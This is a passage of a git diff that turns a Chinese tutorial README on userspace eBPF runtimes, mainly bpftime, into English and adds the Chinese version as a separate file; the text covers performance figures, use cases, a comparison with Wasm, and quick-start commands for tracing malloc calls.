+Much like a kernel Uprobe, bpftime can automatically inject its eBPF runtime into a running userspace process, with no changes to the process's code and no restart required. ubpf and rbpf, by contrast, still need hand-written glue code to integrate with other userspace programs, which comparatively limits their use cases. In some scenarios, bpftime may even serve as an alternative to kernel eBPF; it does not depend on a specific kernel version or on the Linux platform, and can run on other platforms as well.
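To make the glue-code point concrete, here is a minimal sketch of the host-side boilerplate that embedding uBPF requires, written against uBPF's public C API (`ubpf_create`, `ubpf_load`, `ubpf_exec`, `ubpf_destroy`); the bytecode buffer is a placeholder, and a real host would load a clang-compiled eBPF object instead:

```c
/* Minimal sketch of embedding the uBPF VM in a host program.
 * Assumes the current uBPF API; error handling is abbreviated. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <ubpf.h>

int main(void)
{
    /* Placeholder bytecode: a single BPF_EXIT instruction (opcode 0x95).
     * A real host would read the text section of a compiled eBPF object. */
    uint8_t code[8] = { 0x95, 0, 0, 0, 0, 0, 0, 0 };
    uint8_t mem[64] = { 0 }; /* "packet" memory handed to the program */
    uint64_t ret = 0;
    char *errmsg = NULL;

    struct ubpf_vm *vm = ubpf_create();
    if (!vm)
        return 1;
    if (ubpf_load(vm, code, sizeof(code), &errmsg) < 0) {
        fprintf(stderr, "ubpf_load failed: %s\n", errmsg);
        free(errmsg);
        ubpf_destroy(vm);
        return 1;
    }
    ubpf_exec(vm, mem, sizeof(mem), &ret);
    printf("eBPF program returned %llu\n", (unsigned long long)ret);
    ubpf_destroy(vm);
    return 0;
}
```

Every uBPF or rbpf user has to write some variant of this wrapper; bpftime's automatic injection removes exactly this step.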
-| Probe/Tracepoint Types | Kernel (ns) | Userspace (ns) | Insn Count | -|------------------------|-------------:|---------------:|---------------:| -| Uprobe | 3224.172760 | 314.569110 | 4 | -| Uretprobe | 3996.799580 | 381.270270 | 2 | -| Syscall Tracepoint | 151.82801 | 232.57691 | 4 | -| Embedding runtime | Not available | 110.008430 | 4 | +## Why is Having a Userspace Version of eBPF Interesting? -bpftime 可以类似 Kernel 中的 Uprobe 那样,自动将 eBPF 运行时注入到用户空间进程中,无需修改用户空间进程的代码,也无需进行重启进程即可使用。对于 ubpf 和 rbpf 而言,它们依然需要手动编写胶水代码和其他用户空间程序进行集成,相对来说限制了它们的使用场景。在某些场景下,bpftime 可能能作为 kernel eBPF 的一种替代方案,它也不依赖于具体内核版本或 Linux 平台,可以在其他平台上运行。 +eBPF, while renowned for its kernel-space operations, has observed a growing interest in its userspace adaptations. Here's why migrating eBPF to userspace is capturing the attention of technologists: -## 为什么用户空间版本的 eBPF 会吸引如此多的关注? +### Enhanced Performance -eBPF,原本因其在内核空间的强大性能而被广泛认知,但近年来,其在用户空间的实现也引起了业界的浓厚兴趣。以下是技术社区对于 eBPF 迁移到用户空间的热切关注的核心原因: +In kernel operations, the Uprobe component of eBPF is often beleaguered by performance inefficiencies, primarily due to the overheads introduced by context switches. In latency-sensitive applications, these inefficiencies can be detrimental, affecting real-time monitoring and data processing. By transitioning to userspace, eBPF can bypass these context switch related delays, leading to a more optimized performance. Runtimes like `bpftime` exemplify this, offering substantial performance improvements compared to their kernel counterparts. -### 性能提升 +### Flexibility and Integration -在内核空间,eBPF 的 Uprobe 组件时常面临因上下文切换带来的性能瓶颈。这在延迟敏感的应用中可能导致不良影响,从而对实时监控和数据处理带来挑战。但用户空间版本的 eBPF 能够绕过与上下文切换有关的性能损失,实现更高的性能优化。例如,`bpftime` 运行时在用户空间的表现,相较于其内核版本,展现出了显著的性能增益。 +Userspace eBPF runtimes champion flexibility. Unlike some alternatives, such as the Wasm runtime, which might necessitate manual integrations, userspace eBPF provides the boon of automatic instrumentation. This means they can be seamlessly introduced into running processes without the need for cumbersome restarts or recompilations, ensuring smoother operational flows. -### 灵活性与集成度 +### Augmented Security -用户空间的 eBPF 运行时带来了更大的灵活性。与其他解决方案如 Wasm 运行时相比,它们无需手动集成即可提供自动插桩的特性。这意味着开发者可以轻松地将其集成进正在运行的进程中,避免了因重新启动或重新编译带来的操作中断。 +Operating in kernel mode, eBPF programs require root access, which can inadvertently expand the attack surface, making systems susceptible to vulnerabilities like container escapes or even potential kernel exploits. Userspace runtimes, however, operate outside this high-risk zone. By functioning in userspace, they demand fewer privileges, inherently reducing the potential avenues for security breaches. -### 安全性加固 +### Debugging and Licensing Flexibility -在内核空间,eBPF 的执行通常需要 root 访问权限,这可能无意中增加了系统的攻击面,使其容易受到例如容器逃逸或潜在的内核利用等安全威胁。相反,用户空间的实现在这种高风险环境之外运作。它们在用户空间中运行,大大降低了对高权限的依赖,从而减少了潜在的安全风险。 +One of the innate advantages of userspace eBPF runtimes is the ease with which developers can debug their code. The accessibility to integrate breakpoints in a userspace interpreter is a marked advantage over the relatively constrained debugging capabilities in kernel eBPF. Additionally, the licensing flexibility of userspace eBPF runtimes, typically offered under licenses like Apache or MIT, ensures they can be paired with a diverse range of projects, including proprietary ones, sidestepping the GPL constraints associated with kernel code. 
-### 调试与许可的便利性 +## Use Cases: Existing eBPF Userspace Applications -用户空间 eBPF 的一个显著优点是,它为开发者提供了更加直观的调试环境。相对于内核空间中有限的调试手段,用户空间解释器提供的断点调试功能更为方便。此外,用户空间 eBPF 的许可证更加灵活,通常采用 Apache 或 MIT 这样的开源许可,这意味着它们可以轻松地与各种项目(包括商业项目)相结合,避免了与内核代码相关的 GPL 限制。 - -## 使用案例:现有的 eBPF 用户空间应用 - -用户空间 eBPF 正在项目中使用,每个项目都利用 eBPF 的独特功能来增强它们的功能: +Userspace eBPF is being utilized in a number of notable projects, each harnessing the unique capabilities of eBPF to enhance their functionalities. Here's how Userspace eBPF is currently utilized in various applications: 1. [**Oko:**](https://github.com/Orange-OpenSource/Oko) + + Oko is an extension of Open vSwitch-DPDK that provides runtime extension with BPF programs. It enables the use of BPF programs to process packets in userspace, providing flexible packet processing and facilitating the integration of Open vSwitch with other systems. - Oko 是 Open vSwitch-DPDK 的扩展,提供了与 BPF 程序的运行时扩展。它允许使用 BPF 程序在用户空间处理数据包,提供灵活的数据包处理,并促进 Open vSwitch 与其他系统的集成。 +1. [**DPDK eBPF Support:**](https://www.dpdk.org/wp-content/uploads/sites/35/2018/10/pm-07-DPDK-BPFu6.pdf) -1. [**DPDK eBPF 支持:**](https://www.dpdk.org/wp-content/uploads/sites/35/2018/10/pm-07-DPDK-BPFu6.pdf) - - DPDK (数据平面开发套件) eBPF 支持通过允许在用户空间使用 eBPF 程序来促进快速的数据包处理,这些程序可以加载并运行以分析网络数据包。这增强了网络应用的灵活性和可编程性,无需修改内核。 + The DPDK (Data Plane Development Kit) eBPF support facilitates fast packet processing by enabling the use of eBPF programs in userspace, which can be loaded and run to analyze network packets. This enhances the flexibility and programmability of network applications without requiring kernel modifications. 1. [**Solana:**](https://solana.com/) - Solana 利用 eBPF 实现一个 JIT (即时)编译器,这对于在其区块链网络上执行智能合约是至关重要的。使用 eBPF 确保了安全性、性能和架构中立性,从而允许在 Solana 区块链上的验证器节点上高效地执行智能合约。 + Solana utilizes eBPF to implement a JIT (Just-In-Time) compiler, which is essential for executing smart contracts on its blockchain network. The use of eBPF ensures safety, performance, and architecture agnosticism, thus allowing efficient execution of smart contracts across validator nodes on the Solana blockchain. -1. [**eBPF for Windows (进行中的工作):**](https://github.com/microsoft/ebpf-for-windows) +1. [**eBPF for Windows (Work-In-Progress):**](https://github.com/microsoft/ebpf-for-windows) - 该项目旨在将 Linux 生态系统中熟悉的 eBPF 工具链和 API 带到 Windows,允许在 Windows 之上使用现有的 eBPF 工具链。这展示了将 eBPF 的功能扩展到 Linux 之外的有前景的尝试,尽管它仍然是一个进行中的工作。 + This project is aimed at bringing the eBPF toolchains and APIs familiar in the Linux ecosystem to Windows, allowing existing eBPF toolchains to be utilized on top of Windows. This demonstrates a promising endeavor to extend the capabilities of eBPF beyond Linux, although it's still a work in progress. -使用 eBPF 的这些应用的好处包括: +The benefits of using eBPF in these applications include: -- **灵活性:** eBPF 提供了一个灵活的框架,用于在内核或用户空间中运行程序,使开发人员能够扩展现有系统的功能,而无需修改其核心代码。 -- **性能:** 通过允许 JIT 编译和高效的数据包处理,eBPF 可以显著提高网络应用和区块链智能合约执行的性能。 -- **安全性和安全性:** eBPF 框架为验证程序执行前的安全属性提供了机制,从而确保了其集成的系统的完整性和安全性。 -- **跨平台能力:** eBPF 指令集的架构中立性使得跨平台兼容性成为可能,如 Solana 项目和进行中的 eBPF for Windows 所示。 +- **Flexibility:** eBPF provides a flexible framework for running programs in the kernel or userspace, enabling developers to extend the functionality of existing systems without modifying their core code. +- **Performance:** By allowing JIT compilation and efficient packet processing, eBPF can significantly enhance the performance of network applications and blockchain smart contract execution. 
+- **Safety and Security:** The eBPF framework provides mechanisms for verifying the safety properties of programs before execution, thus ensuring the integrity and security of the systems it is integrated with. +- **Cross-platform Capability:** The architecture-agnostic nature of eBPF instruction set enables cross-platform compatibility, as seen in projects like Solana and the work-in-progress eBPF for Windows. -这些属性使 eBPF 成为增强各种应用的强大工具,从网络处理到区块链智能合约执行,再到更多。还有一些论文讨论了在用户空间中使用 eBPF 的用途: +These attributes make eBPF a powerful tool for augmenting a variety of applications, ranging from network processing to blockchain smart contract execution, and beyond. There are also some papers that discuss the use of eBPF in userspace: -1. [**RapidPatch: 用于实时嵌入式设备的固件热修复**](https://www.usenix.org/conference/usenixsecurity22/presentation/he-yi): +1. [**RapidPatch: Firmware Hotpatching for Real-Time Embedded Devices**](https://www.usenix.org/conference/usenixsecurity22/presentation/he-yi): + + This paper introduces a new hotpatching framework named RapidPatch, which is designed to facilitate the propagation of patches by installing generic patches on heterogeneous embedded devices without disrupting other tasks running on them. - 本文介绍了一个名为 RapidPatch 的新的热修复框架,该框架旨在通过在异构嵌入式设备上安装通用修复程序来促进修复的传播,而不会中断它们上运行的其他任务。此外,RapidPatch 提出了两种类型的 eBPF 补丁,用于不同类型的漏洞,并开发了一个 eBPF 补丁验证器以确保补丁安全。 + Furthermore, RapidPatch proposes two types of eBPF patches for different types of vulnerabilities and develops an eBPF patch verifier to ensure patch safety. -2. [**Femto-Containers: 低功耗 IoT 微控制器上的小型软件功能的轻量级虚拟化和故障隔离**](https://arxiv.org/abs/2210.03432): +1. [**Femto-Containers: Lightweight Virtualization and Fault Isolation For Small Software Functions on Low-Power IoT Microcontrollers**](https://arxiv.org/abs/2210.03432): - 本文介绍了 Femto-Containers,这是一个新颖的框架,允许在低功耗 IoT 设备上安全地部署、执行和隔离小型虚拟软件功能。该框架在 RIOT 中实现并提供,RIOT 是一个受欢迎的开源 IoT 操作系统,强调在低功耗 IoT 设备上安全地部署、执行和隔离小型虚拟软件功能。该论文讨论了在一个常见的低功耗 IoT 操作系统 (RIOT) 中集成的 Femto-Container 主机引擎的实现,增强了其在标准的 IPv6/6LoWPAN 网络上按需启动、更新或终止 Femto-Containers 的能力。 + This paper presents Femto-Containers, a novel framework that enables the secure deployment, execution, and isolation of small virtual software functions on low-power IoT devices over a network. -这些论文深入探讨了固件补丁和轻量级虚拟化方面的相关进展,展示了针对实时嵌入式系统和低功耗 IoT 微控制器领域的关键挑战的创新。 + The framework is implemented and provided in RIOT, a popular open source IoT operating system, with an emphasis on secure deployment, execution, and isolation of small virtual software functions on low-power IoT devices, over the network. -## 用户空间 eBPF 运行时 vs Wasm 运行时 + The paper discusses the implementation of a Femto-Container hosting engine integrated within a common low-power IoT operating system (RIOT), enhancing it with the ability to start, update, or terminate Femto-Containers on demand, securely over a standard IPv6/6LoWPAN network. + +These papers delve into pertinent advancements concerning firmware patching and lightweight virtualization, demonstrating innovations that address critical challenges in the domains of real-time embedded systems and low-power IoT microcontrollers respectively. -在不断发展的云原生和边缘计算领域中,eBPF (扩展的伯克利数据包过滤器) 和 Wasm (WebAssembly) 都已成为强大的工具。但它们都有自己的设计原则和权衡取舍。 +## Userspace eBPF Runtime vs Wasm Runtime -## eBPF 在用户空间运行时 vs Wasm 运行时:云原生计算的新纪元 +In the evolving landscape of cloud-native and edge computing, both eBPF (extended Berkeley Packet Filter) and Wasm (WebAssembly) have emerged as powerful tools. However, they come with their own set of design principles and trade-offs. 
-在飞速进展的云原生与边缘计算生态中,eBPF (扩展的伯克利数据包过滤器) 和 Wasm (WebAssembly) 被广泛认为是两大技术巨头。这两者虽然都非常强大,但各有其独特的设计哲学与优缺点。
-
-### eBPF 与 Wasm 之间的技术差异
+### A Comparison of eBPF and Wasm

**eBPF**:

-- **核心理念**:eBPF 是为了满足高性能要求而设计的,特别是针对实时内核交互和高吞吐量的网络任务。
-- **安全性**:尽管eBPF的主要焦点是性能,但其验证器机制确保了执行的程序在不引发内核恐慌或无限循环的前提下的安全性。
-
+- **Philosophy**: eBPF prioritizes performance, often making it the choice for real-time kernel operations and high-throughput networking tasks.
+- **Security**: While performance takes the forefront, safety in eBPF is ensured through a verifier, which guarantees that programs run without causing kernel panics or infinite loops.
+
**Wasm**:

-- **核心理念**:Wasm 诞生于网络环境,其设计重点在于可移植性和执行安全性,旨在实现接近本地机器代码的执行速度。
-- **安全性**:Wasm 的安全策略主要基于软件故障隔离 (SFI)。沙盒执行确保了代码的安全性,但这可能会带来某些运行时的额外开销。
+- **Philosophy**: Originally designed for the web, Wasm places a higher emphasis on portability and security. It was conceived to execute code nearly as fast as native machine code while ensuring safety in hostile environments like web browsers.
+- **Security**: Wasm's primary security model revolves around Software Fault Isolation (SFI). It guarantees safe execution by enforcing sandboxing, even though this can introduce some runtime overhead.

-这两种技术都依赖于底层的库来执行复杂任务,如 Wasm 所依赖的 `Wasi-nn` 来进行神经网络处理。与这些外部API 交互时,特别是在 Wasm 的环境下,需要进行更多的验证和运行时检查,这可能导致额外的性能损耗。而eBPF则提供了一个更为性能中心化的策略,其验证器确保了代码在主机上的安全执行,而不需要运行时的额外开销。
+Both technologies rely on underlying libraries for complex operations; for instance, Wasm leans on libraries like `Wasi-nn` for neural network workloads. When interfacing with such external APIs, especially in Wasm's context, additional validation and runtime checks are needed, sometimes at a substantial performance cost. eBPF, embedded within the host, relies on its verifier to ensure code safety up front, offering a more performance-centric approach without extra runtime overhead.

-在语言支持上,由于 eBPF 的专业特性,其语言选择较为有限,通常是 C 和 Rust。而Wasm则支持更多的编程语言,包括但不限于 C、C++、Rust、Go、Python、Java和C#。这使得Wasm在跨平台部署上有更大的灵活性,但也可能因为不恰当的语言选择引入更多的性能开销。
+On the language-support front, eBPF's niche and specialized nature limit the choice of languages, typically to C and Rust, while Wasm supports a much broader portfolio, including but not limited to C, C++, Rust, Go, Python, Java, and C#. This gives Wasm greater flexibility for cross-platform deployment, although a poorly suited language choice can introduce additional performance overhead.

-为了给大家提供一个直观的对比,我们在 [https://github.com/eunomia-bpf/bpf-benchmark](https://github.com/eunomia-bpf/bpf-benchmark)中展示了eBPF和Wasm运行时的性能比较。
+For an intuitive comparison, we present performance benchmarks of the eBPF and Wasm runtimes at [https://github.com/eunomia-bpf/bpf-benchmark](https://github.com/eunomia-bpf/bpf-benchmark).

-从更宏观的角度看,eBPF运行时和Wasm实际上可以被视为是相互补充的。尽管 eBPF 拥有出色的验证器机制来确保运行时安全性,但由于其编程语言的局限性和相对较高的开发难度,它并不总是适合作为业务逻辑的首选运行时。反之,eBPF 更适用于像网络流量转发、可观测性和 livepatch 这样的高专业性任务。相对而言,Wasm 运行时可以作为 Serverless 的运行时平台、插件系统和轻量级虚拟化等场景的首选。这两者都有自己的优势,但它们的选择取决于特定的用例和优先级。
+From a broader perspective, eBPF runtimes and Wasm can be viewed as complementary. Although eBPF has an excellent verifier to ensure runtime safety, its limited language options and comparatively steep development curve mean it is not always the first choice for hosting business logic; it is better suited to highly specialized tasks such as network traffic forwarding, observability, and livepatching. Wasm runtimes, conversely, are a natural first choice for serverless platforms, plugin systems, and lightweight virtualization. Each has its strengths, and the choice between them depends on the specific use case and priorities.

-## bpftime 快速入门
+## bpftime Quick Start

+With `bpftime`, you can build eBPF applications using familiar tools like clang and libbpf, and execute them in userspace. For instance, the `malloc` eBPF program traces malloc calls using a uprobe and aggregates the counts in a hash map.

+You can refer to [documents/build-and-test.md](https://eunomia.dev/bpftime/documents/build-and-test) for how to build the project, or use the container images from [GitHub packages](https://github.com/eunomia-bpf/bpftime/pkgs/container/bpftime).
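As an orientation before running the commands below, here is a sketch of what such a malloc-counting uprobe program could look like. This is a hypothetical reconstruction rather than the actual `example/malloc` source, and the `SEC("uprobe/libc.so.6:malloc")` auto-attach path in particular is an assumption:

```c
// Hypothetical sketch of a malloc-counting uprobe program; the real one
// lives in example/malloc of the bpftime repository, and all names here
// (map, function, section path) are illustrative assumptions.
#include "vmlinux.h"
#include <bpf/bpf_helpers.h>

struct {
    __uint(type, BPF_MAP_TYPE_HASH);
    __uint(max_entries, 1024);
    __type(key, u32);   /* pid */
    __type(value, u64); /* number of malloc calls seen */
} malloc_counts SEC(".maps");

SEC("uprobe/libc.so.6:malloc")
int count_malloc(struct pt_regs *ctx)
{
    u32 pid = bpf_get_current_pid_tgid() >> 32;
    u64 one = 1, *cnt;

    /* Increment the per-pid counter, creating it on first sight. */
    cnt = bpf_map_lookup_elem(&malloc_counts, &pid);
    if (cnt)
        __sync_fetch_and_add(cnt, 1);
    else
        bpf_map_update_elem(&malloc_counts, &pid, &one, BPF_ANY);
    return 0;
}

char LICENSE[] SEC("license") = "GPL";
```

Because such a program is plain libbpf-style eBPF, the same object can be loaded either by the kernel or by bpftime, which is what makes the side-by-side runs below possible.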
-使用`bpftime`,您可以使用熟悉的工具(如clang和libbpf)构建eBPF应用程序,并在用户空间中执行它们。例如,`malloc` eBPF程序使用uprobe跟踪malloc调用,并使用哈希映射对其进行统计。
-
-您可以参考[documents/build-and-test.md](https://eunomia.dev/bpftime/documents/build-and-test)上的构建项目的方法,或者使用来自[GitHub packages](https://github.com/eunomia-bpf/bpftime/pkgs/container/bpftime)的容器映像。
-
-要开始,请构建并运行一个基于libbpf的eBPF程序,使用以下命令行:
+To get started, you can build and run a libbpf-based eBPF program with the `bpftime` CLI:

```console
-make -C example/malloc # 构建示例的eBPF程序
+make -C example/malloc # Build the eBPF program example
bpftime load ./example/malloc/malloc
```

-在另一个shell中,运行带有eBPF的目标程序:
+In another shell, run the target program with the eBPF runtime injected:

```console
$ bpftime start ./example/malloc/victim
@@ -155,25 +152,25 @@ continue malloc...
malloc called from pid 250215
```

-您还可以动态地将eBPF程序附加到正在运行的进程上:
+You can also dynamically attach the eBPF program to a running process:

```console
-$ ./example/malloc/victim & echo $! # 进程ID为101771
+$ ./example/malloc/victim & echo $! # The pid is 101771
[1] 101771
101771
continue malloc...
continue malloc...
```

-然后附加到该进程:
+Then attach to it:

```console
-$ sudo bpftime attach 101771 # 您可能需要以root身份运行make install
+$ sudo bpftime attach 101771 # You may need to run make install as root
Inject: "/root/.bpftime/libbpftime-agent.so"
-成功注入。ID: 1
+Successfully injected. ID: 1
```

-您可以看到原始程序的输出:
+You can then see the output from the original loader program:

```console
$ bpftime load ./example/malloc/malloc
@@ -183,7 +180,7 @@
 pid=247322 malloc calls: 10
```

-或者,您也可以直接在内核eBPF中运行我们的示例eBPF程序,以查看类似的输出:
+Alternatively, you can run our sample eBPF program directly in kernel eBPF and see similar output:

```console
$ sudo example/malloc/malloc
@@ -194,19 +191,21 @@
 pid=34809 malloc calls: 8
```

-有关更多详细信息,请参阅[documents/usage.md](https://eunomia.dev/bpftime/documents/usage)。
+See [documents/usage.md](https://eunomia.dev/bpftime/documents/usage) for more details.

-## 总结与前景
+## Conclusion

-用户空间的eBPF运行时正在打破边界,将eBPF的能力从内核扩展到了更广阔的领域。这种扩展带来了显著的性能、灵活性和安全性提升。例如,`bpftime`运行时显示了其在某些低级性能场景下,甚至超越了像 Wasm 这样的其他技术。也有越来越多的应用将用户空间的 eBPF 用于快速补丁、轻量级虚拟化、网络过滤等场景。
+Userspace eBPF runtimes are an exciting development that expands the capabilities of eBPF beyond the kernel. As highlighted in this post, they offer compelling benefits such as enhanced performance, flexibility, and security compared to kernel-based eBPF. Runtimes like bpftime demonstrate the potential for substantial speedups, even outperforming alternatives like Wasm runtimes along certain dimensions such as low-level performance.

-Wasm 的主要焦点在于可移植性、轻量级虚拟化、安全性、多语言等等,而 eBPF 则针对那些对性能有严格要求的基础设施任务提供了更多的性能优势和动态插桩特性。选择哪种技术取决于特定的需求和优先级。随着它们的进一步发展,用户空间的eBPF运行时正在成为云原生技术堆栈中的重要部分,为业界带来前所未有的安全、效率和创新的组合。
+With innovative frameworks like RapidPatch and Femto-Containers using userspace eBPF for hotpatching and lightweight virtualization respectively, we are witnessing pioneering use cases that address critical challenges in embedded systems and IoT. As eBPF continues its evolution in userspace, we can expect even more creative applications that augment everything from smart contracts to network protocols.

-> 我们诚邀您深入探索用户空间eBPF的世界,您可以从我们的项目 [https://github.com/eunomia-bpf/bpftime](https://github.com/eunomia-bpf/bpftime) 开始。您的贡献、反馈或仅仅是对此工具的使用和 star,都可以为我们的社区带来巨大价值。
+While alternatives like Wasm certainly have their place with a strong emphasis on web portability and security, eBPF's specialized nature gives it an edge for performance-critical tasks.
Ultimately, the choice between the two depends on the specific use case and priorities. As they continue to evolve, userspace eBPF runtimes are cementing their position as an indispensable part of the cloud-native technology stack, offering an unparalleled combination of safety, efficiency and innovation. + +> We encourage our readers to dive deep into the world of userspace eBPF, starting with our bpftime GitHub repository: Contributions, feedback, or simply using the tool can further the cause and provide invaluable insights to the community. > -> 若您在研究中采用了我们的`bpftime`项目,请[引用我们的仓库](https://github.com/eunomia-bpf/bpftime/blob/master/CITATION.cff)。我们期待您的宝贵意见和反馈,您可以通过 GitHub 仓库的 issue、邮箱 [yunwei356@gmail.com](mailto:yunwei356@gmail.com) 或微信 yunwei2567 与我们联系。 +> If you use our project in research, please [cite our repo](https://github.com/eunomia-bpf/bpftime/blob/master/CITATION.cff). -## 参考资料 +## reference 1. bpftime: 2. ubpf: diff --git a/src/36-userspace-ebpf/README.zh.md b/src/36-userspace-ebpf/README.zh.md new file mode 100644 index 0000000..be83019 --- /dev/null +++ b/src/36-userspace-ebpf/README.zh.md @@ -0,0 +1,219 @@ +# 用户空间 eBPF 运行时:深度解析与应用实践 + +郑昱笙 + +本文旨在对用户空间的 eBPF 运行时和对应的一些应用场景进行剖析和总结。尽管大多数人对基于内核的 eBPF 已有所了解,用户空间 eBPF 的进展和应用实践同样引人注目。本文还将探讨用户空间 eBPF 运行时与 Wasm 运行时的技术比较,后者在云原生和边缘计算领域已获得广泛的关注。我们也新开源了一个用户态 eBPF 运行时 [bpftime](https://github.com/eunomia-bpf/bpftime)。通过 LLVM `JIT/AOT` 后端支持,我们的基准测试表明 bpftime 是最快的用户空间 eBPF 运行时之一,同时还可以让内核中间的 eBPF Uprobe 无缝在用户空间运行,获得近十倍的性能提升。 + +## eBPF:内核的动态扩展运行时与字节码 + +### eBPF 究竟是何方神圣? + +eBPF,全称 "extended Berkeley Packet Filter",是一项允许在不更改内核源代码或重启系统的情况下动态干预和修改内核行为的革命性技术。虽然 eBPF 起初是作为网络数据包过滤工具而设计,但如今已广泛应用于从性能分析到安全策略等多个方面,逐渐成为系统管理员的得力助手。 + +eBPF 的前身,Berkeley Packet Filter (BPF) —— 20 世纪 90 年代初的产物,主要用于网络数据包的高效过滤。尽管 BPF 已被广大用户所认可,eBPF 的出现则为其带来了更为广泛的指令集,并能直接与内核数据结构互动。自 2014 年 Linux 内核引入 eBPF 以后,它的影响力迅速扩张。Linux 的核心开发团队不断地完善 eBPF,使其从一个基础的网络数据包过滤器逐渐演变为一个功能强大的字节码引擎。 + +### eBPF 对现代计算和网络的深远影响 + +随着现代计算环境日益复杂,实时数据的采集和深入分析显得尤为重要。在这一背景下,eBPF 凭借其卓越的动态性,为开发者和管理员提供了实时干预系统行为的强大工具。eBPF 以其卓越的灵活性在现代网络解决方案中占据核心地位。它为流量控制、负载均衡及安全策略在内核级别提供了细致的控制手段,确保了系统的性能优化和安全稳定。同时,eBPF 在系统可观察性上也做出了显著贡献,为各种系统调用和硬件事件提供了详细的可编程追踪方案,促进了问题的迅速定位和解决。 + +## 用户空间 eBPF 运行时:eBPF 的新生代 + +### 什么是用户空间 eBPF 运行时? 
+ +虽然 eBPF 最初是为内核设计的,但它在用户空间的巨大潜力,以及内核对于 `GPL LICENSE` 的限制,也催生了用户空间 eBPF 运行时的产生。这些运行时允许开发者在内核之外利用 eBPF 的能力,提供了一个在内核之外的运行平台,扩展其实用性和适用性,同时不受限于 GPL LICENSE。虽然 eBPF 的一个突出特点是其在内核空间内执行代码的能力,提供快速的可观察性和数据聚合,但在某些情境下,拥有一个用户空间的替代方案变得非常有价值。这些用户空间运行时扩展了 eBPF 多功能性的范围,超越了内核集成,并常常作为特定用例的实验场地、调试工具或框架。 + +### 特定运行时简介 + +#### **ubpf** + +[uBPF](https://github.com/iovisor/ubpf) 是将 eBPF 引入用户空间的早期尝试之一。主要作为一个概念证明,它作为 eBPF 解释器的用户空间解释与 x86_64 和 arm64 JIT 的结合。尽管其起源是一个早期原型,uBPF 吸引了注意并被用作高性能网络项目(如 DPDK 和 Oko)的基础。它的非 GPL 许可证(Apache)使其适用于各种项目,包括非开源项目。然而,最近,uBPF 正在迎头赶上内核发展,特别是微软为其 eBPF Windows 实现做出的贡献。但是,开发 ubpf 和 rbpf 程序可能需要一个特定的工具链,这对于一些用户可能是一个障碍。ubpf 只有一个有限的哈希 maps 实现,对大多数场景而言可能不够。另外,ubpf 本身只是一个虚拟机/解释器,在实际的使用中,依然需要编写胶水代码,和其他用户空间程序进行编译、链接后才能使用。 + +#### **rbpf** + +[rbpf](https://github.com/qmonnet/rbpf) 和 uBPF 非常相似,但重点是使用了 Rust 进行开发,这是一种因其内存安全保证而著称的语言。创建 rbpf 是由于想要探索 eBPF 和 Rust 的交集。虽然没有广泛采纳,但 rbpf 的知名用户包括 Solana 团队,他们使用它为带有 eBPF 驱动的智能合约的区块链工具。rbpf 的一个优势在于其许可证 (MIT),允许在各种项目中广泛重用。rbpf 也缺乏 eBPF Maps 支持,并且仅为 x86_64 提供 JIT 支持。同样,rbpf 也需要编译和手动嵌入对应的应用程序中才可以使用。 + +#### **bpftime** + +基于 LLVM JIT/AOT 构建的 [bpftime](https://github.com/eunomia-bpf/bpftime) 是专为用户空间操作设计的一个高性能 eBPF 运行时。它以其快速的 Uprobe 能力和 Syscall 钩子脱颖而出,尤其是 Uprobe 性能比内核提高了十倍。此外,bpftime 提供编程 syscall 钩子、共享内存映射和与熟悉的工具链(如 libbpf 和 clang)的兼容性。其设计解决了一些内核 eBPF 的限制,并在某些方面超越了像 Wasm 运行时这样的插件系统。这是使用 Userspace bpftime 的 eBPF 进行 Hook 的一些性能数据,将用户空间和内核空间进行对比: + +| Probe/Tracepoint Types | Kernel (ns) | Userspace (ns) | Insn Count | +|------------------------|-------------:|---------------:|---------------:| +| Uprobe | 3224.172760 | 314.569110 | 4 | +| Uretprobe | 3996.799580 | 381.270270 | 2 | +| Syscall Tracepoint | 151.82801 | 232.57691 | 4 | +| Embedding runtime | Not available | 110.008430 | 4 | + +bpftime 可以类似 Kernel 中的 Uprobe 那样,自动将 eBPF 运行时注入到用户空间进程中,无需修改用户空间进程的代码,也无需进行重启进程即可使用。对于 ubpf 和 rbpf 而言,它们依然需要手动编写胶水代码和其他用户空间程序进行集成,相对来说限制了它们的使用场景。在某些场景下,bpftime 可能能作为 kernel eBPF 的一种替代方案,它也不依赖于具体内核版本或 Linux 平台,可以在其他平台上运行。 + +## 为什么用户空间版本的 eBPF 会吸引如此多的关注? + +eBPF,原本因其在内核空间的强大性能而被广泛认知,但近年来,其在用户空间的实现也引起了业界的浓厚兴趣。以下是技术社区对于 eBPF 迁移到用户空间的热切关注的核心原因: + +### 性能提升 + +在内核空间,eBPF 的 Uprobe 组件时常面临因上下文切换带来的性能瓶颈。这在延迟敏感的应用中可能导致不良影响,从而对实时监控和数据处理带来挑战。但用户空间版本的 eBPF 能够绕过与上下文切换有关的性能损失,实现更高的性能优化。例如,`bpftime` 运行时在用户空间的表现,相较于其内核版本,展现出了显著的性能增益。 + +### 灵活性与集成度 + +用户空间的 eBPF 运行时带来了更大的灵活性。与其他解决方案如 Wasm 运行时相比,它们无需手动集成即可提供自动插桩的特性。这意味着开发者可以轻松地将其集成进正在运行的进程中,避免了因重新启动或重新编译带来的操作中断。 + +### 安全性加固 + +在内核空间,eBPF 的执行通常需要 root 访问权限,这可能无意中增加了系统的攻击面,使其容易受到例如容器逃逸或潜在的内核利用等安全威胁。相反,用户空间的实现在这种高风险环境之外运作。它们在用户空间中运行,大大降低了对高权限的依赖,从而减少了潜在的安全风险。 + +### 调试与许可的便利性 + +用户空间 eBPF 的一个显著优点是,它为开发者提供了更加直观的调试环境。相对于内核空间中有限的调试手段,用户空间解释器提供的断点调试功能更为方便。此外,用户空间 eBPF 的许可证更加灵活,通常采用 Apache 或 MIT 这样的开源许可,这意味着它们可以轻松地与各种项目(包括商业项目)相结合,避免了与内核代码相关的 GPL 限制。 + +## 使用案例:现有的 eBPF 用户空间应用 + +用户空间 eBPF 正在项目中使用,每个项目都利用 eBPF 的独特功能来增强它们的功能: + +1. [**Oko:**](https://github.com/Orange-OpenSource/Oko) + + Oko 是 Open vSwitch-DPDK 的扩展,提供了与 BPF 程序的运行时扩展。它允许使用 BPF 程序在用户空间处理数据包,提供灵活的数据包处理,并促进 Open vSwitch 与其他系统的集成。 + +1. [**DPDK eBPF 支持:**](https://www.dpdk.org/wp-content/uploads/sites/35/2018/10/pm-07-DPDK-BPFu6.pdf) + + DPDK (数据平面开发套件) eBPF 支持通过允许在用户空间使用 eBPF 程序来促进快速的数据包处理,这些程序可以加载并运行以分析网络数据包。这增强了网络应用的灵活性和可编程性,无需修改内核。 + +1. 